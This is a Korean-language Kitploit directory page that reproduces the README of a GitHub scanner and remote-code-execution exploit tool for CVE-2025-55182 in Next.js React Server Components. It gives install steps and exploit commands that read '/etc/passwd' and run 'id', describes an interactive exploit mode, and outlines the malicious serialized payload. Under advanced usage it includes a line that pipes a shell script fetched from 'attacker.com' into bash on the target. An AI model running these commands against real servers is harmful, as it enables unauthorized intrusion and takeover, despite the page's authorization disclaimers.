Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
Vulnerability ScannersCode AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

A Python 기반 보안 스캐너로, Next.js 애플리케이션에서 **React Server Components (RSC)** 취약점을 탐지하고 익스플로잇합니다. 이 도구는 수동 탐지, 능동적 핑거프린팅 및 RCE 익스플로잇 테스트를 수행합니다.

저장소 보기
118개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RSC Detector - React Server Components 취약점 스캐너

Next.js 애플리케이션에서 React Server Components (RSC) 취약점을 탐지 및 악용하기 위한 Python 기반 보안 스캐너입니다. 이 도구는 수동 탐지, 능동 핑거프린팅, RCE 익스플로잇 테스트를 수행합니다.

⚠️ 경고: 이 도구는 승인된 보안 테스트용으로만 사용해야 합니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 항상 테스트 전에 서면 허가를 받으십시오.


기능

✅ 수동 탐지 - HTML, 헤더, 페이지 구조를 분석하여 RSC 표시기(indicator) 탐지
✅ 능동 핑거프린팅 - RSC 특정 헤더를 전송하여 서버 응답 탐지
✅ HTTP 헤더 분석 - Next.js 및 RSC 관련 헤더 식별
✅ RCE 익스플로잇 - 취약한 서버에서 명령 실행 (악용 가능한 경우)
✅ 컬러 터미널 출력 - 가독성 향상을 위한 시각적 피드백 개선
✅ 대화형 모드 - 익스플로잇 모드에서 여러 명령 실행
✅ 강력한 디코딩 - gzip 압축 및 바이너리 페이로드 처리


설치

사전 요구 사항

  • Python 3.8+
  • pip (Python 패키지 관리자)

설정

  1. 저장소 클론

    root@kitploit:~
    git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
    cd CVE-2025-55182
    
  • 종속성 설치

    root@kitploit:~
    pip install -r requirements.txt
    

    필요한 패키지:

    • requests>=2.28.0 - HTTP 클라이언트 라이브러리
    • urllib3>=1.26.0 - 고급 HTTP 유틸리티
    • colorama>=0.4.6 - 터미널 색상 (Windows 호환)
    • beautifulsoup4 - HTML 파싱

  • 사용법

    기본 탐지 (익스플로잇 없음)

    root@kitploit:~
    python rsc_detector.py https://example.com
    

    익스플로잇을 포함한 전체 스캔

    root@kitploit:~
    python rsc_detector.py https://example.com --exploit
    

    특정 명령 실행

    root@kitploit:~
    python rsc_detector.py https://example.com --exploit --cmd "whoami"
    

    대화형 익스플로잇 모드

    root@kitploit:~
    python rsc_detector.py https://example.com --exploit
    

    그런 다음 프롬프트에서 명령을 입력합니다 (종료하려면 quit 입력).


    명령줄 옵션

    옵션설명
    <URL>대상 URL (필수). 생략 시 자동으로 https:// 접두사 추가
    --exploit탐지 후 RCE 익스플로잇 활성화
    --cmd <command>특정 명령 실행 (--exploit과 함께 사용)

    예제

    RSC 취약점 탐지:

    root@kitploit:~
    python rsc_detector.py https://target.com
    

    익스플로잇 및 id 명령 실행:

    root@kitploit:~
    python rsc_detector.py https://target.com --exploit --cmd "id"
    

    익스플로잇 및 cat /etc/passwd 실행:

    root@kitploit:~
    python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
    

    대화형 모드 (여러 명령):

    root@kitploit:~
    python rsc_detector.py https://target.com --exploit
    

    작동 방식

    1. 수동 스캔

    • window.__next_f 마커 (Next.js App Router) 확인
    • text/x-component Content-Type 탐지
    • React Flight Protocol 마커 검색
    • __NEXT_DATA__ 및 Next.js 임포트 분석

    2. 헤더 분석

    • Server, Vary, X-Nextjs-Cache 헤더 검사
    • HTTP 헤더에서 RSC 인식 여부 식별

    3. 능동 핑거프린팅

    • RSC: 1 헤더로 요청 전송
    • RSC 특정 헤더에 대한 서버 응답 분석
    • React Flight Protocol 구조 탐지

    4. RCE 익스플로잇

    • React Server Component 직렬화를 악용하는 악성 JSON 페이로드 구성
    • 서버 측 코드 실행을 트리거하기 위해 multipart form-data 전송
    • base64 인코딩된 명령 출력 디코딩
    • gzip 압축 응답 지원

    출력 및 결과

    탐지 결과

    root@kitploit:~
    [*] Starting RSC Detection Scan on: https://example.com
    ====================================================================
    
    [1] Running Passive Scan...
        Status: DETECTED
        Score: 80/100
        - Found: window.__next_f (App Router)
    
    [2] Analyzing Headers...
        - Vary header includes RSC: ...
    
    [3] Running Active Fingerprint...
        Status: DETECTED
        - Response Content-Type became text/x-component
        - Vary header contains 'RSC'
    
    ====================================================================
    
    [FINAL RESULT] VULNERABLE
    [!] This application appears to be vulnerable to RSC-based attacks!
        Consider: RCE exploitation may be possible
    

    익스플로잇 출력

    root@kitploit:~
    [*] Executing command: whoami
    [+] Command executed successfully!
    [OUTPUT]
    root
    

    취약점 세부 정보

    CVE-2025-55182 악용:

    • React Server Component (RSC) 직렬화 결함
    • Next.js Server Action 역직렬화 취약점
    • 악의적인 페이로드를 통한 객체 프로토타입 오염
    • child_process.execSync()를 통한 명령 삽입

    공격 표면

    • App Router를 사용하는 Next.js 애플리케이션
    • 사용자 제어 입력이 있는 Server Components
    • RSC가 활성화되었으나 제대로 검증되지 않은 애플리케이션

    법적 및 윤리적 지침

    ⚠️ 중요

    이 도구는 승인된 보안 테스트용으로만 엄격히 사용해야 합니다:

    1. ✅ 해야 할 일: 소유하고 있거나 테스트할 서면 허가를 받은 시스템에서 사용
    2. ✅ 해야 할 일: 취약점을 공급업체에 책임감 있게 보고
    3. ✅ 해야 할 일: 책임 있는 공개 관행 준수
    4. ❌ 하지 말아야 할 일: 허가 없이 시스템에 사용
    5. ❌ 하지 말아야 할 일: 악의적인 목적으로 사용
    6. ❌ 하지 말아야 할 일: 민감한 데이터 저장 또는 실행

    무단 컴퓨터 접근은 불법입니다 관련 법률:

    • Computer Fraud and Abuse Act (CFAA) - 미국
    • Computer Misuse Act 1990 - 영국
    • 대부분의 국가에서 유사한 법률

    책임 있는 공개

    이 도구를 사용하여 취약점을 발견한 경우:

    1. 하지 말 것: 공급업체가 패치를 적용할 때까지 공개하지 마십시오
    2. 연락: 공급업체의 보안 팀에 직접 연락하십시오
    3. 허용: 패치 개발을 위해 90일의 기간을 주십시오
    4. 협력: 공개 시기에 대해 공급업체와 조정하십시오
    5. 인정: 공개 후 권고에서 자신을 인정받으십시오

    문제 해결

    SSL 인증서 오류

    도구는 기본적으로 SSL 확인을 무시합니다. 확인을 활성화하려면:

    root@kitploit:~
    detector = RSCDetector(url, verify_ssl=True)
    

    Base64 디코딩 오류

    도구는 자동으로:

    • 잘못된 base64 문자열에 패딩 추가
    • gzip 페이로드 탐지 및 압축 해제
    • 바이너리 데이터에 대해 UTF-8 대체 문자로 폴백

    응답에 "digest" 키가 없음

    • 대상이 취약하지 않을 수 있음
    • 서버가 익스플로잇 페이로드를 필터링할 수 있음
    • 수동 테스트 또는 다른 엔드포인트 시도

    시간 초과 문제

    코드에서 시간 초과 증가:

    root@kitploit:~
    response = self.session.get(self.url, timeout=30)  # 30 seconds
    

    프로젝트 구조

    root@kitploit:~
    CVE-2025-55182/
    ├── README.md                # This file
    ├── requirements.txt         # Python dependencies
    ├── rsc_detector.py         # Main scanner & exploit engine
    ├── rsc_cli.py              # CLI utilities (if present)
    ├── script.py               # Additional scripts (if present)
    ├── COLOR_GUIDE.md          # Color output documentation
    └── .gitignore              # Git ignore rules
    

    종속성

    root@kitploit:~
    requests>=2.28.0         # HTTP requests
    urllib3>=1.26.0          # Advanced HTTP
    beautifulsoup4>=4.11.0   # HTML parsing
    colorama>=0.4.6          # Terminal colors (Windows)
    

    한 번에 모두 설치:

    root@kitploit:~
    pip install -r requirements.txt
    

    성능 팁

    • 탐지 속도 향상: 스캔만 하는 경우 --exploit 플래그 생략
    • 일괄 테스트: 여러 URL을 스캔하는 스크립트 생성
    • 네트워크 타임아웃: 느린 네트워크에 맞게 타임아웃 값 조정
    • SSL 우회: 유연성을 위해 기본적으로 확인 비활성화됨

    고급 사용법

    사용자 명령 실행

    root@kitploit:~
    python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"
    

    출력 리디렉션

    root@kitploit:~
    python rsc_detector.py https://target.com > scan_results.txt 2>&1
    

    일괄 스캔

    root@kitploit:~
    for url in https://site1.com https://site2.com; do
        python rsc_detector.py "$url"
    done
    

    제한 사항

    • ⚠️ 취약한 Next.js 구성에서만 작동
    • ⚠️ 대상 애플리케이션에서 RSC가 활성화되어 있어야 함
    • ⚠️ 일부 서버는 익스플로잇 페이로드를 필터링하거나 차단할 수 있음
    • ⚠️ 바이너리 출력이 터미널에서 올바르게 표시되지 않을 수 있음
    • ⚠️ 명령 실행은 서버 권한에 따라 다름

    기여하기

    버그를 발견하셨나요? 개선할 점이 있나요? 기여를 환영합니다!

    1. 저장소 포크
    2. 기능 브랜치 생성 (git checkout -b feature/improvement)
    3. 변경 사항 커밋 (git commit -am 'Add feature')
    4. 브랜치 푸시 (git push origin feature/improvement)
    5. Pull Request 제출

    면책 조항

    root@kitploit:~
    THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
    THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
    USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.
    

    라이선스

    이 프로젝트는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.


    참고 자료

    • React Server Components 문서
    • Next.js App Router
    • CVE-2025-55182 (사용 가능 시)
    • OWASP: 인젝션 결함

    연락처 및 지원

    • 취약점 보고: 책임 있는 공개 사용
    • 보안 문제: 공개적으로 게시하지 말고 유지관리자에게 직접 연락
    • 기능 요청: GitHub에 이슈 열기

    저자

    보안 연구 및 승인된 침투 테스트를 위해 제작되었습니다.

    마지막 업데이트: 2025년 12월 19일


    변경 로그

    v1.0.0

    • ✅ 수동 RSC 탐지
    • ✅ 능동 핑거프린팅
    • ✅ RCE 익스플로잇
    • ✅ 컬러 터미널 출력
    • ✅ 대화형 익스플로잇 모드
    • ✅ Gzip 압축 해제 지원
    • ✅ 강력한 base64 디코딩

    기억하세요: 큰 힘에는 큰 책임이 따릅니다. 이 도구를 윤리적이고 합법적으로 사용하세요.

    도구 다운로드